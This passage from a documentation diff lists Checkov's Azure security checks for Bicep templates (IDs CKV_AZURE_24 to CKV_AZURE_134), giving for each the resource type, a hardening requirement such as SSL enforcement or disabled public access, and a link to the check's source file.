+|  33 | CKV_AZURE_24  | resource  | Microsoft.Sql/servers/auditingSettings                                       | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                   | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml)                                           |
+|  34 | CKV_AZURE_25  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Threat Detection types' is set to 'All'                                                         | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                                           |
+|  35 | CKV_AZURE_26  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                    | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                                               |
+|  36 | CKV_AZURE_27  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                             | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                                               |
+|  37 | CKV_AZURE_28  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                                                     |
+|  38 | CKV_AZURE_29  | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                           | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                                           |
+|  39 | CKV_AZURE_30  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                           |
+|  40 | CKV_AZURE_30  | resource  | configurations                                                               | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                           |
+|  41 | CKV_AZURE_31  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                           |
+|  42 | CKV_AZURE_31  | resource  | configurations                                                               | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                         | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                           |
+|  43 | CKV_AZURE_32  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                               |
+|  44 | CKV_AZURE_32  | resource  | configurations                                                               | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                               |
+|  45 | CKV_AZURE_33  | resource  | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests                      | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)                                     |
+|  46 | CKV_AZURE_34  | resource  | Microsoft.Storage/storageAccounts/blobServices/containers                    | Ensure that 'Public access level' is set to Private for blob containers                                      | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                     |
+|  47 | CKV_AZURE_34  | resource  | blobServices/containers                                                      | Ensure that 'Public access level' is set to Private for blob containers                                      | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                     |
+|  48 | CKV_AZURE_34  | resource  | containers                                                                   | Ensure that 'Public access level' is set to Private for blob containers                                      | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                     |
+|  49 | CKV_AZURE_35  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure default network access rule for Storage Accounts is set to deny                                       | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py)                                 |
+|  50 | CKV_AZURE_36  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access                                    | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py)                             |
+|  51 | CKV_AZURE_37  | resource  | Microsoft.Insights/logprofiles                                               | Ensure that Activity Log Retention is set 365 days or greater                                                | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py)                                                         |
+|  52 | CKV_AZURE_38  | resource  | Microsoft.Insights/logprofiles                                               | Ensure audit profile captures all the activities                                                             | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py)                                                               |
+|  53 | CKV_AZURE_39  | resource  | Microsoft.Authorization/roleDefinitions                                      | Ensure that no custom subscription owner roles are created                                                   | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py)                                           |
+|  54 | CKV_AZURE_40  | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that the expiration date is set on all keys                                                           | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py)                                                                                   |
+|  55 | CKV_AZURE_41  | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that the expiration date is set on all secrets                                                        | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py)                                                                             |
+|  56 | CKV_AZURE_42  | resource  | Microsoft.KeyVault/vaults                                                    | Ensure the key vault is recoverable                                                                          | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py)                                                                       |
+|  57 | CKV_AZURE_43  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure Storage Accounts adhere to the naming rules                                                           | Bicep | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py)                                                                                 |
+|  58 | CKV_AZURE_44  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure Storage Account is using the latest version of TLS encryption                                         | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py)                                                       |
+|  59 | CKV_AZURE_45  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that no sensitive credentials are exposed in VM custom_data                                           | Bicep | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py)                                                                               |
+|  60 | CKV_AZURE_47  | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers                                      | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py)                                                             |
+|  61 | CKV_AZURE_48  | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure 'public network access enabled' is set to 'False' for MariaDB servers                                 | Bicep | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py)                                                               |
+|  62 | CKV_AZURE_49  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead)                          | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py)                                                                           |
+|  63 | CKV_AZURE_50  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Virtual Machine Extensions are not Installed                                                          | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py)                                                                       |
+|  64 | CKV_AZURE_52  | resource  | Microsoft.Sql/servers                                                        | Ensure MSSQL is using the latest version of TLS encryption                                                   | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py)                                                                     |
+|  65 | CKV_AZURE_53  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure 'public network access enabled' is set to 'False' for mySQL servers                                   | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py)                                                                   |
+|  66 | CKV_AZURE_54  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure MySQL is using the latest version of TLS encryption                                                   | Bicep | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py)                                                                     |
+|  67 | CKV_AZURE_56  | resource  | Microsoft.Web/sites/config                                                   | Ensure that function apps enables Authentication                                                             | Bicep | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py)                                                     |
+|  68 | CKV_AZURE_57  | resource  | Microsoft.Web/sites                                                          | Ensure that CORS disallows every resource to access app services                                             | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py)                                                                         |
+|  69 | CKV_AZURE_58  | resource  | Microsoft.Synapse/workspaces                                                 | Ensure that Azure Synapse workspaces enables managed virtual networks                                        | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py)                           |
+|  70 | CKV_AZURE_59  | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that Storage accounts disallow public access                                                          | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py)                                                   |
+|  71 | CKV_AZURE_62  | resource  | Microsoft.Web/sites                                                          | Ensure function apps are not accessible from all regions                                                     | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py)                                                                       |
+|  72 | CKV_AZURE_63  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables HTTP logging                                                                 | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py)                                                             |
+|  73 | CKV_AZURE_64  | resource  | Microsoft.StorageSync/storageSyncServices                                    | Ensure that Azure File Sync disables public network access                                                   | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py)                                                       |
+|  74 | CKV_AZURE_65  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables detailed error messages                                                      | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py)                                         |
+|  75 | CKV_AZURE_66  | resource  | Microsoft.Web/sites/config                                                   | Ensure that App service enables failed request tracing                                                       | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py)                                                           |
+|  76 | CKV_AZURE_67  | resource  | Microsoft.Web/sites                                                          | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                    | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                             |
+|  77 | CKV_AZURE_67  | resource  | Microsoft.Web/sites/slots                                                    | Ensure that 'HTTP Version' is the latest, if used to run the Function app                                    | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py)                                                             |
+|  78 | CKV_AZURE_68  | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server disables public network access                                                 | Bicep | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py)                                             |
+|  79 | CKV_AZURE_70  | resource  | Microsoft.Web/sites                                                          | Ensure that Function apps is only accessible over HTTPS                                                      | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                       |
+|  80 | CKV_AZURE_70  | resource  | Microsoft.Web/sites/config                                                   | Ensure that Function apps is only accessible over HTTPS                                                      | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                       |
+|  81 | CKV_AZURE_70  | resource  | Microsoft.Web/sites/slots                                                    | Ensure that Function apps is only accessible over HTTPS                                                      | Bicep | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py)                                                       |
+|  82 | CKV_AZURE_71  | resource  | Microsoft.Web/sites                                                          | Ensure that Managed identity provider is enabled for web apps                                                | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py)                                                   |
+|  83 | CKV_AZURE_72  | resource  | Microsoft.Web/sites                                                          | Ensure that remote debugging is not enabled for app services                                                 | Bicep | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py)                                               |
+|  84 | CKV_AZURE_73  | resource  | Microsoft.Automation/automationAccounts/variables                            | Ensure that Automation account variables are encrypted                                                       | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py)                                                                               |
+|  85 | CKV_AZURE_74  | resource  | Microsoft.Kusto/clusters                                                     | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                 | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py)                                                         |
+|  86 | CKV_AZURE_75  | resource  | Microsoft.Kusto/clusters                                                     | Ensure that Azure Data Explorer uses double encryption                                                       | Bicep | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py)                                     |
+|  87 | CKV_AZURE_76  | resource  | Microsoft.Batch/batchAccounts                                                | Ensure that Azure Batch account uses key vault to encrypt data                                               | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py)                                       |
+|  88 | CKV_AZURE_78  | resource  | Microsoft.Web/sites                                                          | Ensure FTP deployments are disabled                                                                          | Bicep | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py)                                                                               |
+|  89 | CKV_AZURE_79  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for SQL servers on machines                                          | Bicep | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py)                                                             |
+|  90 | CKV_AZURE_80  | resource  | Microsoft.Web/sites/config                                                   | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                          | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py)                                                     |
+|  91 | CKV_AZURE_81  | resource  | Microsoft.Web/sites                                                          | Ensure that 'PHP version' is the latest, if used to run the web app                                          | Bicep | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py)                                                                             |
+|  92 | CKV_AZURE_82  | resource  | Microsoft.Web/sites                                                          | Ensure that 'Python version' is the latest, if used to run the web app                                       | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py)                                                                       |
+|  93 | CKV_AZURE_83  | resource  | Microsoft.Web/sites                                                          | Ensure that 'Java version' is the latest, if used to run the web app                                         | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py)                                                                           |
+|  94 | CKV_AZURE_84  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for Storage                                                          | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py)                                                                         |
+|  95 | CKV_AZURE_85  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for Kubernetes                                                       | Bicep | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py)                                                                   |
+|  96 | CKV_AZURE_87  | resource  | Microsoft.Security/pricings                                                  | Ensure that Azure Defender is set to On for Key Vault                                                        | Bicep | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py)                                                                     |
+|  97 | CKV_AZURE_88  | resource  | Microsoft.Web/sites/config                                                   | Ensure that app services use Azure Files                                                                     | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py)                                                                     |
+|  98 | CKV_AZURE_89  | resource  | Microsoft.Cache/redis                                                        | Ensure that Azure Cache for Redis disables public network access                                             | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py)                                             |
+|  99 | CKV_AZURE_92  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual Machines use managed disks                                                               | Bicep | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py)                                                                                       |
+| 100 | CKV_AZURE_93  | resource  | Microsoft.Compute/disks                                                      | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                                           |
+| 101 | CKV_AZURE_94  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that My SQL server enables geo-redundant backups                                                      | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                                           |
+| 102 | CKV_AZURE_95  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                            | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                                           |
+| 103 | CKV_AZURE_96  | resource  | Microsoft.DBforMySQL/flexibleServers                                         | Ensure that MySQL server enables infrastructure encryption                                                   | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                                                         |
+| 104 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachineScaleSets                                    | Ensure that Virtual machine scale sets have encryption at host enabled                                       | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                   |
+| 105 | CKV_AZURE_97  | resource  | Microsoft.Compute/virtualMachines                                            | Ensure that Virtual machine scale sets have encryption at host enabled                                       | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                   |
+| 106 | CKV_AZURE_99  | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure Cosmos DB accounts have restricted access                                                             | Bicep | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py)                                                     |
+| 107 | CKV_AZURE_100 | resource  | Microsoft.DocumentDb/databaseAccounts                                        | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                            | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                                                       |
+| 108 | CKV_AZURE_101 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure that Azure Cosmos DB disables public network access                                                   | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                                           |
+| 109 | CKV_AZURE_102 | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server enables geo-redundant backups                                                  | Bicep | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py)                                                             |
+| 110 | CKV_AZURE_103 | resource  | Microsoft.DataFactory/factories                                              | Ensure that Azure Data Factory uses Git repository for source control                                        | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                                             |
+| 111 | CKV_AZURE_104 | resource  | Microsoft.DataFactory/factories                                              | Ensure that Azure Data factory public network access is disabled                                             | Bicep | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py)                                                     |
+| 112 | CKV_AZURE_105 | resource  | Microsoft.DataLakeStore/accounts                                             | Ensure that Data Lake Store accounts enables encryption                                                      | Bicep | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py)                                                                       |
+| 113 | CKV_AZURE_107 | resource  | Microsoft.ApiManagement/service                                              | Ensure that API management services use virtual networks                                                     | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                                             |
+| 114 | CKV_AZURE_109 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault allows firewall rules settings                                                         | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                                             |
+| 115 | CKV_AZURE_110 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault enables purge protection                                                               | Bicep | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py)                                                         |
+| 116 | CKV_AZURE_111 | resource  | Microsoft.KeyVault/vaults                                                    | Ensure that key vault enables soft delete                                                                    | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                                                   |
+| 117 | CKV_AZURE_112 | resource  | Microsoft.KeyVault/vaults/keys                                               | Ensure that key vault key is backed by HSM                                                                   | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                                                         |
+| 118 | CKV_AZURE_113 | resource  | Microsoft.Sql/servers                                                        | Ensure that SQL server disables public network access                                                        | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                                                     |
+| 119 | CKV_AZURE_114 | resource  | Microsoft.KeyVault/vaults/secrets                                            | Ensure that key vault secrets have "content_type" set                                                        | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                                                   |
+| 120 | CKV_AZURE_121 | resource  | Microsoft.Network/frontDoors                                                 | Ensure that Azure Front Door enables WAF                                                                     | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                                                     |
+| 121 | CKV_AZURE_123 | resource  | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                    | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                   | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                                               |
+| 122 | CKV_AZURE_125 | resource  | Microsoft.ServiceFabric/clusters                                             | Ensures that Service Fabric use three levels of protection available                                         | Bicep | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py)                                     |
+| 123 | CKV_AZURE_129 | resource  | Microsoft.DBforMariaDB/servers                                               | Ensure that MariaDB server enables geo-redundant backups                                                     | Bicep | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py)                                                                       |
+| 124 | CKV_AZURE_130 | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure that PostgreSQL server enables infrastructure encryption                                              | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                                               |
+| 125 | CKV_AZURE_131 | parameter | string                                                                       | SecureString parameter should not have hardcoded default values                                              | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py)                                      |
+| 126 | CKV_AZURE_132 | resource  | Microsoft.DocumentDB/databaseAccounts                                        | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                 | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                                           |
+| 127 | CKV_AZURE_133 | resource  | Microsoft.Network/frontdoorWebApplicationFirewallPolicies                    | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                   | Bicep | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py)                                                               |
+| 128 | CKV_AZURE_134 | resource  | Microsoft.CognitiveServices/accounts                                         | Ensure that Cognitive Services accounts disable public network access                                        | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)                                         |
